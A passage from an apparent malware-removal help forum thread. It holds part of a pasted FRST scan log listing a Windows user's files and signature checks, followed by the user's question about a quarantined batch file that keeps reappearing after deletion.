____D C:\WINDOWS\system32\appraiser 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\Provisioning 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\bcastdvr 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Dism 2016-09-24 17:41 - 2016-08-02 17:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZCA 2016-09-19 20:09 - 2014-07-16 23:40 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information ==================== Files in the root of some directories ======= 2005-11-27 00:53 - 2005-11-27 00:53 - 0049152 _____ ( ) C:\Program Files\Interop.WIA.dll 2013-08-25 18:57 - 2013-08-25 18:57 - 0001968 _____ () C:\Program Files\License.txt 2016-09-12 14:54 - 2016-09-12 14:54 - 1703120 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Base.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 3425792 ____C () C:\Program Files\PaintDotNet.Base.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0638160 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Core.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 2088448 ____C () C:\Program Files\PaintDotNet.Core.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0086736 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Data.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0259584 ____C () C:\Program Files\PaintDotNet.Data.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0191184 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Effects.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0488960 ____C () C:\Program Files\PaintDotNet.Effects.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 1764560 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.exe 2016-06-28 11:34 - 2016-06-28 11:34 - 0000534 _____ () C:\Program Files\PaintDotNet.exe.config 2016-09-12 14:55 - 2016-09-12 14:55 - 0333520 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Framework.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 1152512 ____C () C:\Program Files\PaintDotNet.Framework.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 4308480 ____C () C:\Program Files\PaintDotNet.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0414928 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Resources.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0048640 ____C () C:\Program Files\PaintDotNet.Resources.pdb 2016-09-03 11:06 - 2016-09-03 11:06 - 0146082 ____R () C:\Program Files\PaintDotNet.Strings.3.cs.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0141848 ____R () C:\Program Files\PaintDotNet.Strings.3.da.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0147862 ____R () C:\Program Files\PaintDotNet.Strings.3.DE.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0147219 ____R () C:\Program Files\PaintDotNet.Strings.3.ES.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0158943 ____R () C:\Program Files\PaintDotNet.Strings.3.fa.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0140908 ____R () C:\Program Files\PaintDotNet.Strings.3.fi.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0149616 ____R () C:\Program Files\PaintDotNet.Strings.3.FR.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0189638 ____R () C:\Program Files\PaintDotNet.Strings.3.hi.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146360 ____R () C:\Program Files\PaintDotNet.Strings.3.hu.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0145450 ____R () C:\Program Files\PaintDotNet.Strings.3.it.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0156109 ____R () C:\Program Files\PaintDotNet.Strings.3.JA.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0149217 ____R () C:\Program Files\PaintDotNet.Strings.3.KO.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0148057 ____R () C:\Program Files\PaintDotNet.Strings.3.lt.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0143678 ____R () C:\Program Files\PaintDotNet.Strings.3.nl.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0144619 ____R () C:\Program Files\PaintDotNet.Strings.3.pl.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146572 ____R () C:\Program Files\PaintDotNet.Strings.3.PT-BR.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146254 ____R () C:\Program Files\PaintDotNet.Strings.3.pt-PT.resources 2016-08-05 10:36 - 2016-08-05 10:36 - 0139694 ____R () C:\Program Files\PaintDotNet.Strings.3.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0172690 ____R () C:\Program Files\PaintDotNet.Strings.3.RU.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0143397 ____R () C:\Program Files\PaintDotNet.Strings.3.sv.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0136078 ____R () C:\Program Files\PaintDotNet.Strings.3.ZH-CN.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0138463 ____R () C:\Program Files\PaintDotNet.Strings.3.zh-TW.resources 2016-09-12 14:55 - 2016-09-12 14:55 - 0566480 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.SystemLayer.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 1083600 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x64.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0988368 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x86.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0818688 ____C () C:\Program Files\PaintDotNet.SystemLayer.pdb 2016-09-12 14:54 - 2016-09-12 14:54 - 0014032 _____ (dotPDN LLC) C:\Program Files\PdnRepair.exe 2015-09-24 19:08 - 2015-09-24 19:08 - 0000235 _____ () C:\Program Files\PdnRepair.exe.config 2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\PdnRepair.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0029904 _____ (dotPDN LLC) C:\Program Files\SetupNgen.exe 2010-04-21 00:57 - 2010-04-21 00:57 - 0000254 _____ () C:\Program Files\SetupNgen.exe.config 2016-09-12 14:55 - 2016-09-12 14:55 - 0028160 ____C () C:\Program Files\SetupNgen.pdb 2016-09-12 14:54 - 2016-09-12 14:54 - 0105680 _____ () C:\Program Files\ShellExtension_x64.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 0096976 _____ () C:\Program Files\ShellExtension_x86.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 0015568 _____ (dotPDN LLC) C:\Program Files\UpdateMonitor.exe 2015-09-24 19:10 - 2015-09-24 19:10 - 0000235 _____ () C:\Program Files\UpdateMonitor.exe.config 2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\UpdateMonitor.pdb 2016-08-13 15:13 - 2016-08-13 15:35 - 0032854 _____ () C:\Users\Kyle Aniel\AppData\Roaming\net.telestream.wirecast.xml 2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ () C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload 2016-10-07 21:17 - 2016-10-07 21:18 - 0003413 _____ () C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd 2015-05-16 20:31 - 2016-07-03 21:04 - 0003584 _____ () C:\Users\Kyle Aniel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2016-08-28 19:53 - 2016-08-28 19:53 - 0001542 _____ () C:\Users\Kyle Aniel\AppData\Local\recently-used.xbel 2014-12-17 21:28 - 2015-01-12 21:53 - 0007601 _____ () C:\Users\Kyle Aniel\AppData\Local\Resmon.ResmonCfg 2016-07-28 20:14 - 2016-07-28 20:14 - 0000028 _____ () C:\Users\Kyle Aniel\AppData\Local\X-Plane Installer.prf 2016-07-28 20:14 - 2016-07-28 20:32 - 0000015 _____ () C:\Users\Kyle Aniel\AppData\Local\X-Plane_drm.prf 2016-07-28 19:14 - 2016-07-28 19:14 - 0000041 _____ () C:\Users\Kyle Aniel\AppData\Local\x-plane_install_10.txt 2014-12-12 16:48 - 2014-12-12 16:48 - 0000057 _____ () C:\ProgramData\Ament.ini 2015-12-05 11:28 - 2015-12-05 11:28 - 0000016 _____ () C:\ProgramData\mntemp 2015-12-05 11:28 - 2015-12-05 11:28 - 0004133 _____ () C:\ProgramData\rxsmznjf.zcp 2016-02-06 15:35 - 2016-02-06 15:35 - 0004865 _____ () C:\ProgramData\smxrsjou.kmd Files to move or delete: ==================== C:\Users\Kyle Aniel\fs9.exe C:\Users\Kyle Aniel\MetricCollection.dll ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed ATTENTION: ==> Could not access BCD. The user is not administrator ==================== End of FRST.txt ============================
  7. I'm getting more afraid by the second. McAfee warns me that this file is quarantined every time I start my laptop. I look into the file directory, and every time I delete it, the batch file returns and McAfee warning pops up again saying the file is quarantined. I did a quick search saying that the trojan will "gain remote access, steal personal info, etc." but I don't know if this specific trojan actually does this. I ran ESET Poweliks already and it said no infection was found. I did a scan on Malwarebytes and the file was deleted aswell, but returned. Same with McAfee. Can someone give me an explanation on why this is happening?
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.